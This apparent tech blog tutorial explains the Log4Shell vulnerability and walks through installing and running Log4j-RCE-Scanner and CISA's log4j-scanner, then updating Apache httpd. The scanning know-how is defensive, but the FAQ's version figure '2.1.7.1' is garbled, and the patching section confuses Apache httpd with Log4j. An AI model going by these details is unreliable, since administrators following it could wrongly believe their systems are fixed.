56tvmao: How-to instructions you can trust. Linux What Is Log4Shell and How to Protect Your Linux System Against It

What Is Log4Shell and How to Protect Your Linux System Against It

The Log4Shell (CVE-2021-44228) vulnerability is described by many cybersecurity researchers and experts to be the most critical zero-day vulnerability of all time. It affects a widely-used Java utility by the name of Log4j, which has been around since 2001 for logging and communicating events, such as routine system operations and software errors. Here we show you how to protect your Linux system against it.

Content

Also read: 5 Questions to Help You Learn the Fundamentals of Programming

How Does the Log4Shell Vulnerability Work?

On a fundamental level, the vulnerability is caused by improper input validation. This happens when software doesn’t properly validate the data it receives, leading to possible vulnerabilities, since incorrectly validated input can be used to make the program perform actions it’s not supposed to.

Log4Shell specifically takes advantage of requests Log4j sends to servers, utilizing LDAP and JNDI. By taking advantage of these requests, an attacker can execute code on any vulnerable system, which can lead to a malicious actor taking complete control of the system and having the ability to install ransomware or steal data.

What Does Log4Shell Affect?

Since Java is an extremely popular programming language, a lot of software written in Java that uses Log4j for its logging functionality is affected by this vulnerability. Some of the most well-known and commonly-used software affected by this vulnerability include Apache and the video game called Minecraft.

Also read: 10 Best Minecraft Editors and Utilities for Linux

How to Know Which Software Are Affected?

Log4Shell, like any other cybersecurity vulnerability, is mitigated by patching the software affected by it. However, the case of Log4Shell is a bit more unique, since it affects such a wide range of software, and it can be difficult to keep a list of what is affected and what isn’t.

Luckily, the National Cyber Security Center of The Netherlands has published a comprehensive list on GitHub, which includes names of software developed by different organizations, that informs whether they are vulnerable to Log4Shell.

How to Scan Your Apache Server for the Vulnerability

Since this vulnerability has greatly affected the cybersecurity and software communities, it is no surprise that there are tools available for administrators to scan their servers for the vulnerability.

One such scanner is Log4j-RCE-Scanner, which allows you to scan for remote command execution vulnerability on Apache Log4j at multiple addresses.

Also read: How to Use cURL for Command Line Data Transfer and More

Installing Log4j-RCE-Scanner

Before we start, we need to install its dependencies, httpx and curl.

Curl can be easily installed on Ubuntu and Debian-based systems using the apt command:

sudo apt install curl

The same can be done on Arch Linux using the pacman command:

sudo pacman -Sy curl

And on CentOS and Fedora installations using the yum command:

sudo yum install curl

Installing httpx can be done with the following commands:

git clone https://github.com/projectdiscovery/httpx
cd httpx/cmd/httpx && go build .
sudo mv httpx /usr/local/bin/

After installing all of the necessary dependencies, clone the Log4J-RCE-Scanner repository:

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner

Access the newly created directory:

cd Log4j-RCE-Scanner/

Finally, add the necessary executable permissions for the Bash script:

chmod +x log4j-rce-scanner.sh

Also read: 8 Useful and Interesting Bash Prompts

Using Log4j-RCE-Scanner

After you have installed the scanner, you can finally get to the fun part of actually using it.

Read the script’s help section by typing:

bash log4j-rce-scanner.sh -h

Now, you can scan your Apache server for the Log4shell vulnerability.

bash log4j-rce-scanner.sh -d [domain] -b [Burp collaborator]

You can specify your domain and Burp Collaborator using the -d and -b flags. If your domain is vulnerable, DNS callbacks with the vulnerable domain name are sent to the Burp Collaborator.

Alternatively, the -l flag can also be used to specify a list of domains.

Also read: How to Install and Configure bspwm in Linux

Installing and Using a Python-Based Scanner

If you prefer to use a Python script instead, you can use the log4-scanner, which is developed by the Cybersecurity and Infrastructure Security Agency of the United States.

To install it:

git clone https://github.com/cisagov/log4j-scanner/

Access the directory:

cd log4j-scanner/log4-scanner/

You can install the required dependencies using the Python-based pip3 command:

pip3 install -r requirements.txt

You can view the “help” provided by the script using the -h flag:

python3 log4j-scan.py -h

Scanning a single URL is simple and can be done using the -u flag:

python3 log4j-scan.py -u example.com

You can also scan a list of URLs by using the -l flag:

python3 log4j-scan.py -l list.txt

Also read: How to Clear Git Cache

How to Patch Apache

To combat this vulnerability, it is extremely important to keep your Apache configuration up to date.

Checking the version of Apache can be done in many ways: by checking from your administration panel, such as CPanel, or WebHost Manager. You can also check the version by running the httpd command with the -v flag:

httpd -v

Apache can be updated to the latest, most secure version using the apt command on Debian and Ubuntu systems:

sudo apt update && sudo apt upgrade apache2

The same result is also accomplished using the yum command on CentOS:

sudo yum install httpd

Also read: 5 of the Best Game-Programming Languages for Developers

Frequently Asked Questions

1. Which versions of Log4j are affected by the vulnerability?

Versions below 2.1.7.1 are vulnerable to the exploit. Version 2.15.0 fixed the most easily exploitable elements, with 2.17.1 fixing a difficult-to-exploit remote code execution vulnerability.

2. Do I need the Burp Collaborator utility to receive DNS callbacks with vulnerable domain names?

According to the developer of the Bash-based scanner, Burp Collaborator is used alongside the script itself to receive the DNS callbacks with vulnerable domain names. Alternatively, an Interact.sh address can be used.

3. Do I need other dependencies to use the Bash-based scanner?

For basic usage, you only need to have httpx and Curl installed on your system as dependencies. However, for unlocking some functionality, you will also need Subfinder, Assetfinder, and Amass to be installed.


Severi Turusenaho

Technical Writer – Linux & Cybersecurity.

Subscribe to our newsletter!

Our latest tutorials delivered straight to your inbox

Sign up for all newsletters.
By signing up, you agree to our Privacy Policy and European users agree to the data transfer policy. We will not share your data and you can unsubscribe at any time. Subscribe

Related Post